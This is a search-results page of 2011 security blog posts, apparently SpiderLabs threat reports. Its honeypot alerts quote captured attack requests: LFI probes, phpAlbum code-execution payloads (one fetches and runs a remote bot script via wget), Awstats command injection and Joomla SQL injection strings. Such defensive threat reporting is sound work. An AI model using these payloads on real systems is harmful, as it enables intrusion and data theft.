Showing 109 results for: 2011 ×

TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin

The Spiderlabs team at Trustwave published a new advisory for a Cross-Side-Scripting (XSS) found in phpMyAdmin 3.4.8 and previous versions. phpMyAdmin is an open source tool developed in PHP to manage and administer MySQL databases remotely. The vulnerability was discovered...

[Honeypot Alert] User Agent Field Arbitrary PHP Code Execution

While reviewing today's web honeypot logs, SpiderLabs Research identified two new attack variations. Focus on Local File Inclusion attacks Here are some of the LFI attack payloads identified today: GET /_functions.php?prefix=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00...

[Honeypot Alert] phpAlbum PHP Code Execution Attacks

We have seen a number of scans probing for phpAlbum code execution vulns in our web honeypot logs: GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27echo%200wn3d.Nu%27%29.%27; HTTP/1.1 GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27wget%20http://72.41.115.123/.mods/pbot.txt%20-O%20pb.php;%20php%20pb.php;%20wget%20http://72.41.115.123/.mods/sh.txt%20-O%20h4rd.php%27%29.%27; HTTP/1.1 GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0 GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0 GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET...

Mobile Device Location Tracking, and Why It Matters

Throughout the past decade, there has been a substantial increase in mobile device usage. From smartphones to tablets, most individuals possess at least one. More and more people now have ready access to a substantial amount of data through mobile...

[Honeypot Alert] Awstats Command Injection Scanning Detected

Issue Detected Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package. Here are example attacks from the logs: GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0 GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1 GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0 GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d...

Microsoft Patch Tuesday, December 2011

This Patch Tuesday, there are 3 new Critical and 10 new Important Bulletins. With this many high-urgency bulletins, it's tough to get a handle on which ones to tackle first. Of course, "all of them" is the standard answer, but...

[Honeypot Alert] WordPress/Joomla/Mambo SQL Injection Scanning Detected

Our web honeypot analysis today detected scanning looking for SQL Injection flaws in a number of Wordpress/Joomla/Mambo components. GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1 GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&filter=&city_id=&function_id=&limit=5&pageno=1&job_id=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos__users-- HTTP/1.1 GET /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C2%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET...

[Honeypot Alert] Mass Joomla Component LFI Attacks Identified

Joomla Component LFI Vulnerabilities Joomla has hundreds of Controller components. Check out the Joomla Extension site for examples. Unfortunately, the vast majority of these components have LFI vulnerabilities. The vulnerability details are pretty much the same - The vulnerable page...

[Honeypot Alert] WordPress Timthumb Attacks Rising

SpiderLabs Research Team has been tracking an increase in WordPress Timthumb plug-in scanning. How wide spread are the attacks? We just added the following entry to the Web Hacking Incident Database (WHID) - WHID 2011-262: Hackers 'Timthumb' Their Noses At...

Trustwave Protections Deployed: MS11-083

Last week, it was Microsoft's Patch Tuesday! For November, Microsoft released one "critical" bulletin, two "important," and one "moderate". The most critical, MS11-083 (CVE-2011-2013) which indicates a flaw in the TCP/IP implementation that possibly allows remote code execution by an...

Trustwave Protections Deployed: Duqu

Recent reports of the zero-day exploit found in the Win32k True Type Font Parsing engine and indications that Duqu is using this attack vector for infection can be quite concerning especially if your systems are at risk. For those who...

NickiSpy.C - Android Malware Analysis & Demo

Recently I got the chance to dig into a nice little piece of Android spyware, commonly known as 'NickiSpy.C'. I've also seen it referred to as NickiBot, as well as NickiSpy.A and NickySpy.B. Some anti-virus companies even refer to it...